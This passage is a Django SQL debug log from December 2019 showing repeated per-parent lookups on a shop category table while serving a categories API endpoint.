06:21:37,479 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:21:37,482 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:21:37,486 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:21:37,490 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:21:37,494 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:21:37,502 utils 4252 140031503103744 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:21:37,506 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:21:37,510 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:21:37,514 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:21:37,518 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:21:37,524 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:21:37,528 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:21:37,532 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:21:37,536 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:21:37,540 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:21:37,544 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:21:37,550 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:21:37,554 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:21:37,558 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:21:37,562 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:21:37,566 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:21:37,572 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-20 06:21:37,576 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-20 06:21:37,580 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-20 06:21:37,584 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-20 06:21:37,588 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-20 06:21:37,594 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-20 06:21:37,598 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-20 06:21:37,602 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-20 06:21:37,606 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-20 06:21:37,610 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-20 06:21:37,614 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-20 06:21:37,619 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-20 06:21:37,623 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-20 06:21:37,627 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-20 06:21:37,632 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-20 06:21:37,635 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [20/Dec/2019 06:21:37] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-20 06:21:41,310 utils 4252 140031503103744 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-20 06:21:41,323 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-20 06:21:41,329 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-20 06:21:41,333 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-20 06:21:41,339 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-20 06:21:41,343 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-20 06:21:41,347 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-20 06:21:41,351 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-20 06:21:41,356 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-20 06:21:41,362 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-20 06:21:41,365 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-20 06:21:41,369 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-20 06:21:41,373 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-20 06:21:41,377 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-20 06:21:41,383 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-20 06:21:41,387 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-20 06:21:41,391 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-20 06:21:41,395 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-20 06:21:41,399 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-20 06:21:41,405 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-20 06:21:41,409 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-20 06:21:41,413 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-20 06:21:41,417 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-20 06:21:41,421 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-20 06:21:41,425 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-20 06:21:41,430 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-20 06:21:41,434 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-20 06:21:41,438 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-20 06:21:41,442 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-20 06:21:41,446 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-20 06:21:41,452 utils 4252 140031503103744 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 